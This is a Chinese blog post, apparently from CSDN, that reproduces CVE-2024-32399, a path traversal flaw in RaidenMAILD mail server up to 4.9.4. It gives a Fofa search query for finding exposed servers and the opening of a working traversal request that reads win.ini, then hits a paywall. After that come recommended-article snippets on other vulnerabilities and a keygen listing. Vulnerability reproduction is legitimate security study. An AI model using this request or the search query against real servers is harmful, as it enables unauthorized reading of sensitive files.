RaidenMAILD 路径穿越漏洞(CVE-2024-32399)

已于 2024-09-13 11:47:32 修改
阅读量551 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 网络 安全
于 2024-09-13 11:45:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xc_214/article/details/142206965
版权

0x01 漏洞描述:

RaidenMAILD是一款功能强大的邮件服务器软件,旨在提供高效、安全的邮件发送和接收服务。它支持多种邮件协议,如SMTP、POP3和IMAP,适用于个人用户和企业级应用。RaidenMAILD具有易于配置和管理的特点,并提供丰富的安全功能,如反垃圾邮件和防病毒保护,确保用户通信的安全性和可靠性。此外,它还支持多语言界面,适应不同用户的需求。其接口webeditor存在路径穿越漏洞,攻击者可通过该漏洞获取系统敏感文件信息。

0x02 影响版本:

RaidenMAILD Mail Server <= 4.9.4

0x03 搜索语句:

Fofa:body="RaidenMAILD"

0x04 漏洞复现:

GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1) App
了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现】蓝凌EIS 智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞
qq_67810151的博客
03-04 642
蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx 接口存在SQL注入漏洞。未授权的攻击者可以通过该漏洞获取数据库敏感信息。
漏洞复现】aidenMAILD 邮件服务器 路径遍历漏洞(CVE-2024-32399)
qq_67810151的博客
04-26 686
RaidenMAILD 邮件服务器存在路径遍历漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件,从而获取服务器敏感信息。
RaidenMAILD mail server 最新版.rar
07-17
Mail Server 郵件伺服器是目前全世界最通行的訊息傳遞機制而雷電MAILD Mail Server 正是為此打造. 非常歡迎您來到雷電MAILD Mail Server 官方網站, 雷電MAILD Mail Server 是一個適用於全 Windows 平台的電子郵件伺服器. 本公司致力於共享軟體的開發, 所開發之軟體均可自由下載免費使用, 在滿意其功能後, 才決定付費購買, 付費購買的使用者將會收到我們以電子郵件寄送給您的註冊碼來提升至正式版本. 雷電MAILD Mail Server 的出發點是以簡單為其考量, 就算您從來沒裝過郵件伺服器, 只要您本身具備基本的網路知識, 您就能在短短數分鐘內將它架起來. 如果您已經裝過其它的郵件伺服器, 您也會深深感覺到雷電MAILD 真的是眾多 Mail Server 中最簡單安裝的, 更讓人驚奇的是, 它雖然簡單, 功能上的深度卻一點也不含糊, 甚至也已內建 Web Mail 服務, 防火牆功能, 它就是這麼讓人眼睛一亮真叫人不窩心都不行. 尊龍團隊為了國內新世代的優質生活, 從 FTP Server 發展到 MAIL Server, 再從 HTTP Server 發展到 DNS Server, 一連四套伺服器軟體就是要讓國內寬頻玩家能享有獨立自主的架站樂趣. 而在此同時, 也不希望這項樂趣只侷限在少數資深的電腦玩家而已, 我們的宗旨就是只要您有興趣, 架站也可以是輕鬆自在的. ^___^
【复现】用友u8CRM 文件读取漏洞
fushuang333的博客
12-28 889
【复现】用友u8CRM 文件读取漏洞。用友U8CRM 是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
【复现】CVE-2024-32399 RaidenMAILD Mail Server路径遍历漏洞_76
fushuang333的博客
04-26 902
【复现】CVE-2024-32399 路径遍历漏洞RaidenMAILD Mail Server是一个适用于全 Windows 平台的电子邮件服务器。版本4.9.4及以下存在目录遍历漏洞,可能获取敏感数据。
【未公开0day】RaidenMAILD CVE-2024-32399 路径穿越漏洞【附poc下载】
漏洞文库
10-15 346
【未公开0day】RaidenMAILD CVE-2024-32399 路径穿越漏洞【附poc下载】
雷電MAILD---Smart smtp
weixin_33790053的博客
05-26 502
http://www.raidenmaild.com/tw/Help/tips.html 1. 何謂 Relay? 什麼又是 Smart smtp Relay? 我該如何設定呢? Relay 指得是除主機之外, 此伺服器是否為別台電腦 / 使用者做送信到外...
7000个源码批量下载---复制来的
热门推荐
weixin_34353714的博客
09-12 4万+
7000个源码批量下载 7000个源码批量下载 < type="text/javascript" language="JavaScript">document.title="7000个源码批量下载 - "+document.title http://asp.lt263.com/soft/SaGuestBook.rar安全天使字符界面留言本(SaGuestBook)htt...
^KeepTool.v9.0.3.1.Incl.Keygen-BLiZZARD\
sdmmrj的博客
10-02 676
AMPL.A.Mathematical.Programming.Language.v2010.02.28.Cracked-EAT\ Ankh.The.Lost.Treasures.v1.0-TE\ Aveyond.3.The.Lost.Orb.Build.B-DELiGHT\ Battle.Of.Tiles.v1.06.Incl.Keymaker-DELiGHT\ BetterMemo.v
不幸被当做跳板伺服器的解决问题步骤
weixin_33979363的博客
05-26 264
正常的mail server 必须要为非 open relay 的伺服器, 故请你检查设定 http://www.raidenmaild.com/tw/Help/tips.html 会因为设定而变成跳板伺服器的情况实属稀少, 最常见的盗寄情况发生原因为帐密设太简单, 如 admin / admin , test / test, info / info 这类乱设一...
RaidenMAILD v1.9.16
11-02
一个标准的SMTP/POP3邮件伺服器软件,就算你从来没装过邮件服务器,也能在相当短的时间内将它架设起来,而且还有Web远端控制台、WebMail界面、IP限制、标题过滤器、邮件信箱容量限制等方便好用的功能,是架设邮件...
机器人“跨协议对话”秘籍:EtherNet IP转PROFINET网关应用实录
bjbxkj的博客
04-29 344
由于两种协议在通信标准和数据格式上存在差异,导致机器人手臂无法与现场的终端控制器直接通信,设备之间的数据交换无法顺利进行,严重影响了生产线的整体效率。通过该网关的及时引入,我们避免了大规模设备改造带来的高昂成本和生产延误风险,显著提高了设备协作效率和生产线整体性能,获得了生产部门的一致认可。针对这一问题,我们工程师团队经过详细分析和现场测试,决定采用EtherNet/IP转PROFINET通信协议网关(倍讯BX-606-EIP)来实现快速、稳定的协议转换。接受控制器主动发送的指令及数据请求。
网络原理初识
2401_83526138的博客
04-29 361
物理层规定了网络通信中一些硬件设施(网线,光纤,WIFI)的要求。
指定的网络名不再可用0x00000040原因分析及解决方法
电脑技术分享网的博客
04-30 360
如:用户是属于修复别人共享给我的打印机(客户端)或前面两种都是的两个选项场景,勾选修复了【共享主机】更新补丁选项,则可能会出现打印机报错的情况。出现此类问题时,可再次点击重新扫描,找到其中的【共享主机】更新补丁进行还原,即可解决大部分别人共享给我的打印机常见错误修复。2、物理连接问题:如果使用的是网络打印机,确保打印机与网络的连接没有问题,比如网线连接正常,打印机的网络设置正确等。可快速扫描当前连接打印机需要的驱动,在扫描出的打印机驱动中可选择相关打印机驱动版本进行修复安装。
吴恩达强化学习复盘(11)连续状态空间|深度Q网络
wgc2k的博客
04-28 974
这是是一个能让用户在月球上着陆模拟飞行器的应用,它类似于一个被很多强化学习研究者使用的电子游戏。在这个应用中,用户的任务是在月球着陆器快速接近月球表面时,在适当的时间点燃推进器,使其安全降落在着陆台上。
局域网视频会议软件BeeWorks Meet
weixin_53855915的博客
04-29 271
视频会议是企业协作的重要工具,它可以支持日常会议、异地协作等内部沟通需求,节省时间和成本,在与合作伙伴沟通方面,视频会议能助力远程沟通、项目展示及商务谈判,提高合作效率。相比传统的公有云视频会议服务,私有化部署的视频会议系统在安全性、可控性、定制化和成本效益等方面具有显著优势,为企业内部使用提供了强大的支持。BeeWorks音视频会议系统支持多种类型的会议,如网络会议、在线培训、远程招聘等。提供全面的参会管理功能,如添加/删除参会人、控制发言、点名、举手、投票、签到等,方便会议组织者进行高效管理。
SD - WAN 跨境网络专线部署方式介绍
最新发布
seaarea_818的博客
04-30 95
以某企业为例,其在欧洲的分支机构只需将 CPE 设备接入现有的网络环境,通过简单的配置,就能快速与国内总部的网络建立安全、稳定的连接。管理员坐在总部的办公室里,通过控制器的管理界面,就能清晰地了解到欧洲分支网络的运行状态,包括每条链路的带宽使用情况、网络延迟等信息,并根据实际需求灵活调整网络策略。在部署 SD - WAN 跨境网络专线时,企业通常会在国内总部和欧洲分支机构分别部署 CPE设备,这一设备就像是连接企业网络与外部网络的智能桥梁。部署过程也较为便捷,企业无需进行大规模的网络改造工程。
网络钓鱼工具包Darcula引入AI技术 网络犯罪门槛进一步降低
FreeBuf_的博客
04-27 843
AI升级Darcula钓鱼工具,网络犯罪门槛骤降,企业防御告急!
【计算机网络】DHCP——动态配置ip地址
2303_78135757的博客
04-29 580
DHCP 的作用:自动分配 IP 地址及其他网络配置,简化网络管理。 • 工作原理:通过 Discover → Offer → Request → ACK 四步完成 IP 分配。 • 关键特性:IP 地址池、租期管理、续约机制、静态/动态分配。 • 适用场景:企业、家庭、公共场所 Wi-Fi、物联网等动态网络环境。 • 注意事项:需防范 DHCP 欺骗攻击,合理设置租期和排除地址。
最新版RaidenMAILD邮件服务器软件功能介绍
3. **功能丰富**:尽管安装简单,RaidenMAILD Mail Server提供的功能强大且实用,能够满足大多数用户的需求,其中包括Web Mail服务和防火墙功能。 4. **Web Mail服务**:允许用户通过网页浏览器来检查和发送电子...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值